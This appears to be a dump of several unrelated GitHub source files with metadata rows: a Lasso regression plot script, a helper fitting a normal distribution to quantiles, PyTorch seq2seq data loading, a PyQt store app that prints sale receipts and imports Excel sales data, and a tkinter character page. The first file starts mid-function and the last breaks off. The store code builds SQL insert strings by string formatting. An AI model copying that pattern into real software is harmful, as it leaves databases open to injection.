    axes.plot(plotrange, cards, color='r',label="Cards")
    axes.set_ylabel('Value of the coefficient')
    # NOTE(review): the x range includes alpha=0 but the lower limit is 0.1
    # because the axis below is logarithmic — confirm this is intended.
    axes.set_xlim(0.1,10000)
    axes.set_ylim(-10,10)
    axes.set_xscale('log')
    ax.set_xlabel("alpha")
    ax.set_ylabel('R^2')
    ax.plot(plotrange, r2)
    axes.legend(loc = "lower left")
    plt.savefig("plot.pdf", dpi=300, bbox_inches='tight')
def alpha_param(x,y):
    """Fit a Lasso model for each alpha in range(0, 10000, 50).

    x is a DataFrame containing at least the Income/Cards/Rating/Limit
    columns; y is the target (Balance).  Returns five parallel lists:
    (income, lim, rating, cards, r2) — the per-alpha coefficients and the
    test-set R^2 scores.  Models at alpha 100/2000/5000 are dumped to disk.
    NOTE(review): the split is re-shuffled on every call, so repeated runs
    produce different curves — seed train_test_split for reproducibility.
    """
    r2 = []
    income = []
    lim = []
    rating = []
    cards = []
    x_train,x_test,y_train,y_test = train_test_split(x[["Income", "Cards", "Rating","Limit"]],y, shuffle=True,test_size=0.2)
    for i in range(0, 10000, 50):
        # alpha=0 degenerates to OLS; sklearn may warn on that first step.
        model = Lasso(alpha = i,fit_intercept = True)
        #print(x_train)
        model.fit(x_train, y_train)
        y_pred = model.predict(x_test)
        print(model.coef_)
        # coef_ order follows the column selection above:
        # [Income, Cards, Rating, Limit].
        income.append( model.coef_[0])
        cards.append(model.coef_[1])
        rating.append(model.coef_[2])
        lim.append(model.coef_[3])
        r2.append(r2_score( y_test, y_pred ))
        # Snapshot three representative regularization strengths.
        if(i==100):
            dump(model, f'model_1.joblib')
        elif(i==2000):
            dump(model, f'model_2.joblib')
        elif(i==5000):
            dump(model, f'model_3.joblib')
    return income,lim,rating,cards,r2
if __name__ == "__main__":
cred = pd.read_csv("__files/credit.csv", index_col=False, sep=',')
X = cred.drop(['Unnamed: 0','Age','Education','Gender','Student','Married','Ethnicity','Balance'],axis= 1)
#print(X)
inc, lim, rat, car, r2 = alpha_param(X, cred["Balance"])
plotting(inc,lim,rat,car,r2) | chaitanya1chawla/Practicum_Python_for_AI_ML | chapter_8/ex1_lasso/main.py | main.py | py | 2,237 | python | en | code | 0 | github-code | 13 |
14511721612 | from scipy.stats import norm
'''
Given 0 < alpha < 1 and quantiles q_0 < q1 returns mean and std. deviation of normal distribution
X ~ Normal(mu, sigma) such that P(q_0 < X < q_1) = alpha
mu: since normal distribution is symmetric, mu is midway between q_0 and q_1
sigma: X = mu + sigma*Z ~ N(mu, sigma) (Z ~ N(0,1))
P( -(q_1 - q_0)/(2*sigma) < Z < (q_1 - q_0)/(2*sigma) ) = alpha
https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.rv_continuous.html#scipy.stats.rv_continuous
sf(x) = 1 - F(x)
isf = sf^-1
y in [0,1], y = sf( isf( y ) ) = 1 - F( isf(y) )
F( isf(y) ) = 1 - y
F( isf(1-y) ) = y
'''
def fit_norm( alpha, q_0, q_1 ):
    """Fit a normal distribution from a central credible interval.

    Given 0 < alpha < 1 and quantiles q_0 < q_1, returns (mu, sigma) such
    that X ~ Normal(mu, sigma) satisfies P(q_0 < X < q_1) = alpha.
    """
    # The normal is symmetric, so the mean sits midway between the quantiles.
    midpoint = 0.5 * (q_0 + q_1)
    # Standard-normal z value with upper-tail probability (1 - alpha) / 2.
    z = norm.isf(0.5 * (1 - alpha))
    half_width = 0.5 * (q_1 - q_0)
    return midpoint, half_width / z
| leeds-indoor-air/QMRA | helper_functions/fit_normal_to_quantiles.py | fit_normal_to_quantiles.py | py | 785 | python | en | code | 0 | github-code | 13 |
42929190864 | # 데이터과학 group 2
# 데이터 정제 (load file and make word2idx)
from __future__ import unicode_literals, print_function, division
from io import open
import unicodedata
import string
import re
import random
import torch
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
from hparams import hparams
# start token, end token 지정
SOS_token = 0
EOS_token = 1
hp = hparams()
device = hp.device
class Lang:
    """Vocabulary for one language: word <-> index maps plus occurrence
    counts.  Indices 0 and 1 are reserved for the SOS and EOS tokens."""
    def __init__(self, name):
        self.name = name
        self.word2index = {}
        self.word2count = {}
        self.index2word = {0: "SOS", 1: "EOS"}
        self.n_words = 2  # includes SOS and EOS
    def addSentence(self, sentence):
        """Register every space-separated word of *sentence*."""
        for token in sentence.split(' '):
            self.addWord(token)
    def addWord(self, word):
        """Add *word* to the vocabulary, or bump its count if already known."""
        if word in self.word2index:
            self.word2count[word] += 1
            return
        index = self.n_words
        self.word2index[word] = index
        self.index2word[index] = word
        self.word2count[word] = 1
        self.n_words = index + 1
def readLangs(lang1, lang2):
    """Read the parallel corpus data/<lang1>-<lang2>.txt and build Langs.

    Each line holds a tab-separated sentence pair.  The pairs are reversed
    so the second language comes first, and the returned Lang objects use
    the same orientation (input=lang2, output=lang1).

    Returns:
        (input_lang, output_lang, pairs)
    """
    # Bug fix: use a context manager so the file handle is closed
    # deterministically (the original left it open).
    with open('data/%s-%s.txt' % (lang1, lang2), encoding='utf-8') as f:
        lines = f.read().strip().split('\n')
    # Split every line into its tab-separated sentence pair.
    pairs = [[s for s in l.split('\t')] for l in lines]
    # Swap the order, e.g. English/French becomes French/English.
    pairs = [list(reversed(p)) for p in pairs]
    input_lang = Lang(lang2)
    output_lang = Lang(lang1)
    return input_lang, output_lang, pairs
def prepareData(lang1, lang2):
    """Load the corpus and populate both vocabularies.

    Returns (input_lang, output_lang, pairs, max_len), where max_len is the
    longest sentence length in words plus one (see getMAXLENGTH).
    """
    input_lang, output_lang, pairs = readLangs(lang1, lang2)
    for pair in pairs:
        input_lang.addSentence(pair[0])
        output_lang.addSentence(pair[1])
    return input_lang, output_lang, pairs, getMAXLENGTH(pairs)
def getMAXLENGTH(s):
    """Return the longest sentence length (in words) over all pairs, plus one."""
    longest = max(
        max(len(src.split()), len(tgt.split()))
        for src, tgt in s
    )
    return longest + 1
def indexesFromSentence(lang, sentence):
    """Map each space-separated word of *sentence* to its vocabulary index.

    Out-of-vocabulary words fall back to index ``lang.n_words - 1``
    (the UNK handling of the original implementation).
    """
    unk_index = lang.n_words - 1
    return [lang.word2index.get(word, unk_index) for word in sentence.split(' ')]
def tensorFromSentence(lang, sentence, device):
    """Encode *sentence* as a (len+1, 1) long tensor of word indices ending in EOS."""
    indexes = indexesFromSentence(lang, sentence) + [EOS_token]
    return torch.tensor(indexes, dtype=torch.long, device=device).view(-1, 1)
def tensorsFromPair(input_lang, output_lang, pair, device):
    """Encode a (source, target) sentence pair as a pair of index tensors."""
    source, target = pair[0], pair[1]
    return (
        tensorFromSentence(input_lang, source, device=device),
        tensorFromSentence(output_lang, target, device=device),
    )
def loading_test_data(lang1, lang2):
    """Read the held-out corpus data/<lang1>-<lang2>_test.txt.

    Returns the tab-split sentence pairs, reversed to (lang2, lang1) order,
    mirroring readLangs().
    """
    # Bug fix: context manager closes the file handle (the original leaked it).
    with open('data/%s-%s_test.txt' % (lang1, lang2), encoding='utf-8') as f:
        lines = f.read().strip().split('\n')
    pairs = [[s for s in l.split('\t')] for l in lines]
    pairs = [list(reversed(p)) for p in pairs]
    return pairs
if __name__ == "__main__" :
input_lang, output_lang, pairs, max_len = prepareData('eng', 'fra')
print(random.choice(pairs)) | lmhljhlmhljh/pytorch_practice | RNNATTENTION/dataset.py | dataset.py | py | 3,050 | python | en | code | 1 | github-code | 13 |
17464098832 | # -*- coding: utf-8 -*-
"""
__author__ = 'sunny'
__mtime__ = '2017/2/13'
# code is far away from bugs with the god animal protecting
I love animals. They taste delicious.
┏┓ ┏┓
┏┛┻━━━┛┻┓
┃ ☃ ┃
┃ ┳┛ ┗┳ ┃
┃ ┻ ┃
┗━┓ ┏━┛
┃ ┗━━━┓
┃ ┣┓
┃ ┏┛
┗┓┓┏━┳┓┏┛
┃┫┫ ┃┫┫
┗┻┛ ┗┻┛
"""
import json
import logging
import re
from collections import OrderedDict
from collections import defaultdict
from datetime import datetime
import requests
import xlrd
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtPrintSupport import QPrinter, QPrintPreviewDialog
from PyQt5.QtWidgets import *
from common import config
from common.common import cncurrency
from common.exception import ApiException
from common.static_func import get_uuid1, ErrorCode
from common.config import domain, connect as myconnect
from common.time_utils import get_now
from controller import DbHandler
from database.dao.customer.customer_handler import check_customer
from database.dao.sale import sale_handler
from database.dao.sale.sale_handler import get_sale_info_by_one_key
dbhelp = DbHandler.DB_Handler()
selectOrderNo = None
logger = logging.getLogger(__name__)
def do_printer(mainWin, orderNo):
    """Open a print-preview dialog for the given sale order.

    The order id is stashed in the module-global selectOrderNo because the
    paintRequested callback (print_html) only receives the printer object.
    Returns True on success, False if any error occurred.
    """
    try:
        printer = QPrinter(QPrinter.HighResolution)
        # Print preview; actual rendering is delegated to print_html.
        preview = QPrintPreviewDialog(printer, mainWin)
        preview.paintRequested.connect(print_html)
        global selectOrderNo
        selectOrderNo = orderNo
        preview.exec_()
        return True
    except Exception as print_exception:
        print(print_exception)
        return False
def print_html(printer):
    """Render the sale order selectOrderNo as an HTML receipt and print it.

    Store details are fetched from the server; on any failure the locally
    cached store profile is used instead.  Each sale row contributes a fixed
    header section (name/unit/quantity/price/subtotal) plus a variable grid
    of extra attributes laid out five per row.  The accumulated HTML is fed
    to a QTextDocument sized to the computed pageHeight and printed.
    """
    # Fetch store info from the server; fall back to the local profile.
    try:
        if not myconnect:
            raise ApiException(ErrorCode.ErrorRequest)
        code = config.get_local_register_code()
        url = domain + "store/api/detail?code={}".format(code)
        req = requests.get(url=url)
        result_data = json.loads(req.text)
    except Exception as e:
        logger.error(e.__str__())
        store = config.get_local_store_info()
        result_data = {
            'data': {
                "pcId": store.id(),
                "pcPhone": store.phone(),
                "pcAddress": store.address(),
                "pcSign": store.name(),
            },
            'code': 200
        }
    mustSet = ['数量', '单价', '小计', '总价', '单位', '备注']
    if result_data.get("code") != 200:
        storeName = ""
        pcAddress = ""
        pcPhone = ""
    else:
        storeName = result_data.get("data").get("pcSign", "")
        pcAddress = result_data.get("data").get("pcAddress", "")
        pcPhone = result_data.get("data").get("pcPhone", "")
    result = get_sale_info_by_one_key("orderCheckId", selectOrderNo)
    font_size = config.get_print_font_size()
    # *{font-size:65px;}
    if result:
        # Stylesheet header; font sizes are injected from the print settings.
        header = """<html>
                <style>
                table{
                background-color:#000000;
                }
                .linetd{
                    text-align: center;
                    width: 820px;
                    color: red;
                    height: 30px;
                }
                .halftd{
                    width: 410px;
                }
                #content{
                    text-align: center;
                    position: relative;
                    top: 50%;
                    transform: translateY(-50%);
                }
                td{
                    padding:2px;
                    align:center;
                    border:1px solid black;
                    background-color:#ffffff
                }
                """ + "*{font-size:" + str(font_size) + "pt;}" + ".bigWord{font-size:" + str(
            font_size * 1.5) + "pt;}" + "</style><head></head>"
        # *{font-size:50px;}
        tdWidth = 19
        # Receipt header: store name, car plate, sale date, phone, order no.
        body = """
        <body style="text-align: center;">
        <table width=100% CELLPADDING="0" CELLSPACING="1" border="0">
            <tr>
                <td class="bigWord" align="center" colspan="100" width="100%">
                    {storeName}
                </td>
            </tr>
            <tr>
                <td colspan="50">车牌号:{carId}</td>
                <td colspan="50">销售日期:{createdTime}</td>
            </tr>
            <tr>
                <td colspan="50">客户电话:{carPhone}</td>
                <td colspan="50">销售单号:<span style="">{orderNo}</span></td>
            </tr>
            <tr>
                <td colspan="100" height="20px"> </td>
            </tr>
        """.format(storeName=storeName, carId=result[0][2], createdTime=result[0][0], carPhone=result[0][4],
                   orderNo=result[0][1])
        content = ""
        xuhao = 1
        zongjia = 0
        page = 0
        pageHeight = 100
        # One section per sale row in the order.
        for order in result:
            page += 1
            attribute = json.loads(order[8])
            baseHeight = 180
            # 手动排序
            # mustSet = ['数量','单价','小计','总价','单位','备注']
            # 去除mustset后的必然顺序为:"品牌","型号","工时费","更换里程"
            # 后面用字符串排序key来排序
            tempKeyList2 = ["品牌", "型号", "工时费", "更换里程"]
            tempKeyList = list()
            for t in tempKeyList2:
                if attribute.get(t) and attribute.get(t) != '-':
                    tempKeyList.append(t)
            for k, v in attribute.items():
                if k not in mustSet + ["品牌", "型号", "工时费", "更换里程"] and v != "-" and v != "" and k != "检索ID":
                    tempKeyList.append(k)
            tempKeyList.sort()
            noMustSet = OrderedDict()
            for k in tempKeyList:
                noMustSet[k] = attribute.get(k)
            # 总长度要减去备注和名称,因为名称长度另外设置,备注不打印
            td = ""
            keyDict = dict()
            i = 0
            j = 0
            tdList = list()
            keyList = list()
            pageHeight += int(len(noMustSet.keys()) / 5 + 1) * 60 + baseHeight
            # Lay the extra attributes out five cells per row.
            for k, v in noMustSet.items():
                # if k not in mustSet and v != "-" and v != "" and k!="检索ID" :
                td += "<td colspan=\"{tdWidth}\" align=\"center\"><b>{key}</b></td>".format(tdWidth=tdWidth, key=k)
                keyList.append(k)
                if i >= 4:
                    i = 0
                    tdList.append(td)
                    td = ""
                    keyDict[j] = keyList
                    keyList = list()
                    j += 1
                else:
                    i += 1
            # 补齐
            if keyList:
                if len(keyList) < 5:
                    num = len(keyList)
                    for i in range(5 - num):
                        keyList.append("")
                        td += "<td colspan=\"{tdWidth}\" align=\"center\"></td>".format(tdWidth=tdWidth)
                tdList.append(td)
                keyDict[j] = keyList
            # 序号合并列数
            xuNum = len(tdList) * 2 + 2
            # createdTime,orderNo,carId,carUser,carPhone,carModel,workerName,project,brand," \
            # "model,huawen,number,unitPrice,xiaoji,gongshi,ghlc,remark,totalPrice,pcId,unit
            content += """
                <tr>
                    <td colspan="5" align="center"><b>序</b></td>
                    <td colspan="{tdWidth}" align="center"><b>名称</b></td>
                    <td colspan="{tdWidth}" align="center"><b>单位</b></td>
                    <td colspan="{tdWidth}" align="center"><b>数量</b></td>
                    <td colspan="{tdWidth}" align="center"><b>单价</b></td>
                    <td colspan="{tdWidth}" align="center"><b>小计</b></td>
                </tr>
                <tr>
                    <td rowspan="{xuNum}" colspan="5" align="center"><br/>{xuhao}</td>
                    <td colspan="{tdWidth}" align="center">{project}</td>
                    <td colspan="{tdWidth}" align="center">{unit}</td>
                    <td colspan="{tdWidth}" align="center">{number}</td>
                    <td colspan="{tdWidth}" align="center">{unitPrice}</td>
                    <td colspan="{tdWidth}" align="center">{xiaoji}</td>
                </tr>
            """.format(xuNum=xuNum, xuhao=xuhao, unit=attribute.get("单位", ""), number=attribute.get("数量", ""),
                       unitPrice=attribute.get("单价", ""),
                       xiaoji=attribute.get('小计', ""), project=order[7], tdWidth=tdWidth)
            moreContent = ""
            ii = 0
            for td in tdList:
                # 先放入表头
                moreContent += "<tr>" + td + "</tr>"
                # 再放入内容
                moreContent += """
                    <tr>
                        <td colspan="{tdWidth}" align="center">{one}</td>
                        <td colspan="{tdWidth}" align="center">{two}</td>
                        <td colspan="{tdWidth}" align="center">{three}</td>
                        <td colspan="{tdWidth}" align="center">{four}</td>
                        <td colspan="{tdWidth}" align="center">{five}</td>
                    </tr>
                """.format(tdWidth=tdWidth, one=attribute.get(keyDict[ii][0], ""),
                           two=attribute.get(keyDict[ii][1], ""),
                           three=attribute.get(keyDict[ii][2], ""), four=attribute.get(keyDict[ii][3], ""),
                           five=attribute.get(keyDict[ii][4], ""))
                ii += 1
            fenge = """
                <tr>
                    <td colspan="100" height="20px"> </td>
                </tr>
            """
            zongjiaconetent = """
                <tr>
                    <td colspan="95">总价:{zongjia}</td>
                </tr>
            """.format(zongjia=attribute.get('总价', ""))
            content += moreContent + zongjiaconetent + fenge
            xuhao += 1
            # NOTE(review): a single unparsable 总价 resets the running total
            # to 0 instead of skipping that row — confirm this is intended.
            try:
                zongjia += float(attribute.get('总价', 0))
            except:
                zongjia = 0
        zongjia = str(zongjia)
        cn = cncurrency(zongjia)
        # Footer: grand total in Chinese capital numerals plus store contact.
        foot = """
            <tr>
                <td style="height:35px" colspan="70">合计人名币(大写):{cn}</td>
                <td style="height:35px" colspan="30">小写:{zongjia}</td>
            </tr>
            <tr>
                <td colspan="30">{storeName}</td>
                <td colspan="35">地址:{pcAddress}</td>
                <td colspan="35">联系电话:{pcPhone}</td>
            </tr>
        </table>
        </body>
        </html>
        """.format(cn=cn, zongjia=zongjia, storeName=storeName, pcPhone=pcPhone, pcAddress=pcAddress)
        html = header + body + content + foot
        textDocument = QTextDocument()
        textDocument.setHtml(html)
        textDocument.setDocumentMargin(35)
        printer.setPageSize(QPrinter.Custom)
        # height = baseHeight+((page-1)*150)
        # printer.setPaperSize(QSizeF(printer.logicalDpiX()*(86/25.4),height),QPrinter.Point)
        # textDocument.setPageSize(QSizeF(printer.logicalDpiX()*(86/25.4),height))
        printer.setPaperSize(QSizeF(581, pageHeight), QPrinter.Point)
        textDocument.setPageSize(QSizeF(581, pageHeight))
        textOp = QTextOption()
        textOp.setWrapMode(QTextOption.WrapAnywhere)
        textOp.setAlignment(Qt.AlignCenter)
        textDocument.setDefaultTextOption(textOp)
        printer.setOutputFormat(QPrinter.NativeFormat)
        textDocument.print(printer)
def ImportExcel(fileName, self):
    """Import sale records from an Excel workbook into the local database.

    Two formats are supported, distinguished by a regex match on cell (0,0):
    - workbooks exported by this software (date-range banner present):
      rows may use merged cells; consecutive rows with an empty first cell
      are buffered in ``temp`` and flushed as one order;
    - arbitrary workbooks: rows are grouped by (消费时间 + 车牌号) into
      orders and written with a freshly generated orderCheckId.
    In both paths unknown customers are auto-inserted into the User table.
    Note: despite the name, ``self`` is the parent Qt widget for the
    progress dialog, not an instance receiver.
    """
    # 用于正则判断是否是用软件导出的excel文档
    pattern = re.compile(r"^门店系统:\d{4}[-/]\d{2}[/-]\d{2}至\d{4}[-/]\d{2}[/-]\d{2}$")
    # matchs = pattern.match()
    bk = xlrd.open_workbook(fileName)
    try:
        sh = bk.sheet_by_name("消费列表")
    except:
        sh = bk.sheet_by_name("Sheet1")
    nrows = sh.nrows
    temp = list()
    titleList = ['检索ID', 'orderNo', 'createdTime', "pcSign", "carId", "carUser", "carPhone", "carModel", "workerName",
                 "project"]
    userList = ["carId", "carUser", "carPhone", "carModel"]
    mustlen = len(titleList)
    check = str(sh.row_values(0)[0])
    matchs = pattern.match(check)
    title = sh.row_values(1)
    # Modal progress dialog so the user can cancel a long import.
    progress_dialog = QProgressDialog(self)
    progress_dialog.setWindowTitle("导入中")
    progress_dialog.setWindowModality(Qt.WindowModal)
    progress_dialog.setMinimumDuration(4)
    progress_dialog.setWindowTitle(self.tr("请等待"))
    progress_dialog.setLabelText(self.tr("导入中..."))
    progress_dialog.setCancelButtonText(self.tr("取消"))
    progress_dialog.setRange(0, nrows - 3)
    progress_dialog.show()
    if True:
        p = 0
        msgList = list()
        for i in range(2, nrows):
            # 用正则表达式判断第一行数据内容,从而判断是否用软件导出的EXCEL文档
            if matchs:
                # 若是用软件导出的则
                if progress_dialog.wasCanceled():
                    break
                progress_dialog.setValue(p)
                p += 1
                # NOTE(review): this bare try/except skips any row that
                # raises, silently dropping bad data.
                try:
                    # if True:
                    saveData = dict()
                    row_data = sh.row_values(i)
                    if i < nrows - 1:
                        temp2 = sh.row_values(i + 1)
                    else:
                        temp2 = None
                    if temp2 != None and temp2[0] == '':
                        # 合并了单元格则合并内容是空,将后面不是空的内容进行缓存,合并的内容会在最后一条信息中显示,
                        # 此时一并进行录入
                        temp.append(row_data)
                    else:
                        # if row_data[0] != '':
                        if temp:
                            orderCheckId = temp[0][0]
                        else:
                            orderCheckId = row_data[0]
                        checkOrder = get_sale_info_by_one_key("orderCheckId", orderCheckId)
                        # 有此订单的就不保存了
                        if not checkOrder:
                            if temp:
                                temp.append(row_data)
                                allMsg = temp[0]
                                # 接入信息后录入
                                for i in range(len(temp)):
                                    if i != 0:
                                        msg = temp[i]
                                        attribute = {}
                                        for ki in range(len(title)):
                                            allMsg[ki] = str(allMsg[ki])
                                            msg[ki] = str(msg[ki])
                                            if ki < mustlen:
                                                tempK = titleList[ki]
                                                if tempK in ['orderNo', 'carPhone']:
                                                    allMsg[ki] = allMsg[ki].replace('.0', "")
                                                    msg[ki] = msg[ki].replace('.0', "")
                                                if titleList[ki] in ["project"]:
                                                    saveData[tempK] = msg[ki]
                                                else:
                                                    if tempK == "检索ID":
                                                        tempK = "orderCheckId"
                                                    saveData[tempK] = allMsg[ki]
                                            else:
                                                if row_data[ki] == "" or row_data[ki] == "-":
                                                    continue
                                                attribute[title[ki]] = msg[ki]
                                        saveData['attribute'] = json.dumps(attribute)
                                        saveData['id'] = get_uuid1()
                                        dbhelp.add_sale_info(saveData)
                                row_data = allMsg
                            attribute = {}
                            userSave = {}
                            for ki in range(len(title)):
                                row_data[ki] = str(row_data[ki])
                                if ki < mustlen:
                                    if titleList[ki] in ['orderNo', 'carPhone']:
                                        row_data[ki] = row_data[ki].replace('.0', "")
                                    key = titleList[ki]
                                    if key == "检索ID":
                                        key = "orderCheckId"
                                    saveData[key] = row_data[ki]
                                    # 保存用户信息
                                    if key in userList:
                                        userSave[key] = row_data[ki]
                                else:
                                    if row_data[ki] == "" or row_data[ki] == "-":
                                        continue
                                    attribute[title[ki]] = row_data[ki]
                            user = check_customer(userSave.get("carPhone"), userSave.get("carId"))
                            if not user:
                                # 没有此用户则添加
                                key = "userName,carPhone,carModel,carId,createdTime"
                                value = "'{}','{}','{}','{}','{}'".format(userSave.get("carUser"),
                                                                         userSave.get("carPhone"),
                                                                         userSave.get("carModel"),
                                                                         userSave.get("carId"), get_now())
                                try:
                                    # pass
                                    dbhelp.InsertData("User", key, value)
                                except:
                                    pass
                            saveData['attribute'] = json.dumps(attribute)
                            saveData['id'] = get_uuid1()
                            sale_handler.add_sale_info(saveData)
                            # 清空缓存
                            temp = list()
                            # if i == nrows - 1:
                            # 此时是最后一组,则要进行录入
                            # else:
                            #     #合并了单元格则合并内容是空,将后面不是空的内容进行缓存,合并的内容会在最后一条信息中显示,此时一并进行录入
                            #     temp.append(row_data)
                except:
                    continue
            else:
                # 若不是用软件导出的EXCEL文档则
                # for i in range(2,nrows):
                # 先整理参数,全部变成列表,列表里面是字典,字典的key就是title
                try:
                    row_data = sh.row_values(i)
                    tempData = dict()
                    for k in range(len(title)):
                        tempData[title[k]] = row_data[k]
                    msgList.append(tempData)
                except:
                    continue
        if not matchs:
            # Group the collected rows into orders by (time + car plate).
            saveList = defaultdict(list)
            for msg in msgList:
                if not msg.get("消费时间") or not msg.get("车牌号"):
                    continue
                key = msg.get("消费时间") + msg.get("车牌号")
                saveList[key].append(msg)
            # 插入信息
            must = ["订单号", "接待门店", "车牌号", "车主姓名", "联系电话", "车型", "操作人员", "消费项目", "消费时间"]
            for k, v in saveList.items():
                if progress_dialog.wasCanceled():
                    break
                progress_dialog.setValue(p)
                p += 1
                orderCheckId = get_uuid1()
                # 对同一个订单进行录入
                userSave = {}
                for tempDict in v:
                    orderNo = str(tempDict.pop("订单号")) if tempDict.get("订单号", "") != "" else "-"
                    pcSign = tempDict.pop("接待门店", "") if tempDict.get("接待门店", "") != "" else "-"
                    carId = tempDict.pop("车牌号") if tempDict.get("车牌号") != "" else "-"
                    carUser = tempDict.pop("车主姓名", "") if tempDict.get("车主姓名", "") != "" else "-"
                    carPhone = str(tempDict.pop("联系电话", "-")).replace(".0", "") if tempDict.get("联系电话",
                                                                                               "") != "" else "-"
                    carModel = tempDict.pop("车型", "") if tempDict.get("车型", "") != "" else "-"
                    workerName = tempDict.pop("操作人员", "") if tempDict.get("操作人员", "") != "" else "-"
                    project = tempDict.pop("消费项目", "") if tempDict.get("消费项目", "") != "" else "-"
                    createdTime = str(tempDict.pop("消费时间")).replace(".", "-")
                    # 保存用户信息
                    userSave["carId"] = carId if carId != '-' else ""
                    userSave["carUser"] = carUser if carUser != '-' else ""
                    userSave["carPhone"] = (carPhone if carPhone != '-' else "").replace(".0", "")
                    userSave['carModel'] = carModel if carModel != '-' else ""
                    if orderNo != "-":
                        checkOrder = get_sale_info_by_one_key("orderNo", orderNo)
                        if checkOrder:
                            break
                    saveData = {
                        "orderNo": orderNo.replace(".0", ""),
                        "createdTime": createdTime,
                        "pcSign": pcSign,
                        "carId": carId,
                        "carUser": carUser,
                        "carPhone": carPhone,
                        "carModel": carModel,
                        "workerName": workerName,
                        "project": project,
                        "orderCheckId": orderCheckId,
                        "id": get_uuid1(),
                    }
                    tempAttribute = tempDict
                    attribute = dict()
                    for k, v in tempAttribute.items():
                        if k not in must:
                            if v == "":
                                # v = '-'
                                continue
                            attribute[k] = str(v)
                    # Derive the row total: labor fee + quantity * unit price.
                    try:
                        gsf = float(attribute.get("工时费")) if attribute.get("工时费") != "" else 0
                        sl = float(attribute.get("数量")) if attribute.get("数量") != "" else 0
                        dj = float(attribute.get("单价")) if attribute.get("单价") != "" else 0
                        attribute["总价"] = gsf + sl * dj
                    except:
                        pass
                    saveData["attribute"] = json.dumps(attribute)
                    dbhelp.add_sale_info(saveData)
                if userSave.get("carId") and userSave.get("carPhone"):
                    # 当有用户信息的时候判断是否需要自动添加
                    user = check_customer(userSave.get("carPhone"), userSave.get("carId"))
                    if not user:
                        # 没有此用户则添加
                        key = "userName,carPhone,carModel,carId,createdTime"
                        value = "'{}','{}','{}','{}','{}'".format(userSave.get("carUser"), userSave.get("carPhone"),
                                                                 userSave.get("carModel"), userSave.get("carId"),
                                                                 get_now())
                        try:
                            # pass
                            dbhelp.InsertData("User", key, value)
                        except:
                            pass
        # 最后全部导入
        progress_dialog.setValue(nrows - 3)
        progress_dialog.close()
def ImportMenuExcel(fileName, mustSet):
    """Import a two-level menu from the "菜单列表" sheet of an Excel file.

    Column 0 holds the top-level menu name, column 1 a sub-menu entry.
    Missing top-level menus are inserted first; sub-menus are then attached
    to either the new id or the existing one.  Every sub-menu gets the same
    comma-joined attribute list built from mustSet (all flags enabled).
    """
    bk = xlrd.open_workbook(fileName)
    sh = bk.sheet_by_name("菜单列表")
    nrows = sh.nrows
    # Group sub-menu names under their top-level menu name.
    temp = defaultdict(list)
    for i in range(1, nrows):
        row_data = sh.row_values(i)
        menu1 = row_data[0]
        menu2 = row_data[1]
        if menu1 not in temp:
            temp[menu1] = [menu2]
        else:
            temp[menu1].append(menu2)
    # Existing top-level menus: name list plus name -> id lookup.
    menu = dbhelp.getOneMenu()
    menuList = list()
    menuOneKey = dict()
    for data in menu:
        menuList.append(data[1])
        menuOneKey[data[1]] = data[0]
    key = "name,createdTime"
    now = datetime.now()
    # Build "attr1,attr2,..." and a matching "1,1,..." enabled-flag string.
    attribute = ""
    attributeState = ""
    for t in mustSet:
        attribute += "{},".format(t)
        attributeState += "1,"
    attribute = attribute[:-1]
    attributeState = attributeState[:-1]
    for k in temp:
        if k not in menuList:
            # New top-level menu: insert it, then attach all sub-menus.
            value = "\'{}\',\'{}\'".format(k, now)
            menuId = dbhelp.InsertData("OneMenu", key, value)
            for menu2 in temp[k]:
                saveData = {
                    "father": menuId,
                    "name": menu2,
                    "attribute": attribute,
                    "attributeState": attributeState,
                    "createdTime": now
                }
                dbhelp.InsertTwoMenu(saveData)
        else:
            if menuOneKey.get(k):
                # Existing menu: attach sub-menus, ignoring duplicates.
                menuId = menuOneKey.get(k)
                for menu2 in temp[k]:
                    saveData = {
                        "father": menuId,
                        "name": menu2,
                        "attribute": attribute,
                        "attributeState": attributeState,
                        "createdTime": now
                    }
                    try:
                        dbhelp.InsertTwoMenu(saveData)
                    except:
                        pass
| zgj0607/Py-store | controller/view_service/view_service.py | view_service.py | py | 27,490 | python | en | code | 3 | github-code | 13 |
15710019861 | import tkinter as tk
from CharacterInfo import CharacterInfo
import UI
class IntroUIFirstPage(tk.Frame):
    """First page of the character-creation intro: asks for the player's
    name and backstory, and unlocks the Next button once a name is set."""
    def __init__(self, parent, root):
        # parent: enclosing page container (must provide displayNextPage()).
        # root: toplevel window; its title is updated with the chosen name.
        tk.Frame.__init__(self, parent, background="white")
        self.parent = parent
        self.root = root
        self.characterInfo = CharacterInfo()
        self.nameSet = False
        self.backgroundSet = False
        self.characteristicSet = False
    def displayUI(self):
        """Build the name prompt and the free-form story entry widgets."""
        def nameCallback():
            # Only accept non-empty names; a valid name enables Next.
            name = nameEntry.get()
            if(len(name) != 0):
                self.characterInfo.setCharacterName(nameEntry.get())
                name = self.characterInfo.getCharacterName()
                self.root.title("Character Sheet for " + name)
                self.nameSet = True
                self.updateNextButton()
        def storyCallback():
            # Confirmation shown once the story text is submitted.
            text = "You are ready to enter the world of Hogwarts!"
            UI.createMessage(self, text)
        UI.createWhiteSpace(self)
        welcomeMessage = "Welcome to the wizarding world! What is your name?"
        UI.createMessage(self, welcomeMessage)
        nameEntry = UI.createEntryField(self, "Set name", nameCallback)
        UI.createWhiteSpace(self)
        storyMessage1 = "Enter your story below "
        storyMessage2 = "or simply tell the GM about your life so far."
        UI.createMessage(self, storyMessage1 + storyMessage2)
        size = UI.bodyWidth(self.root)
        text = "I'm finished!"
        UI.createMultiLineEntryField(self, text, size, size, storyCallback)
        # in future will need to assign the above to some variable and send it
        # to the character manager
    def updateNextButton(self):
        """Rebuild the page, showing only the Next button once a name is set."""
        def moveToPageTwo():
            self.parent.displayNextPage()
        # Clear every child widget before re-rendering.
        for widget in self.winfo_children():
            widget.destroy()
        if(self.nameSet is True):
            UI.createNextButton(self, moveToPageTwo)
| xooberon/harry-potter-game | IntroUIFirstPage.py | IntroUIFirstPage.py | py | 1,920 | python | en | code | 0 | github-code | 13 |
42235205938 | import os,warnings,json,shutil
from bs4 import BeautifulSoup
warnings.filterwarnings("ignore")
base_path=os.getcwd()
os.chdir('data/')
listdir=os.listdir()
def make_json(path, name, ep, ii):
    """Write the adapter configuration JSON for one report.

    Args:
        path: base working directory; the file lands at <path>\\jsons\\<ii>.json.
        name: instance file name of the report.
        ep: entry-point schema URI taken from the report's schemaRef.
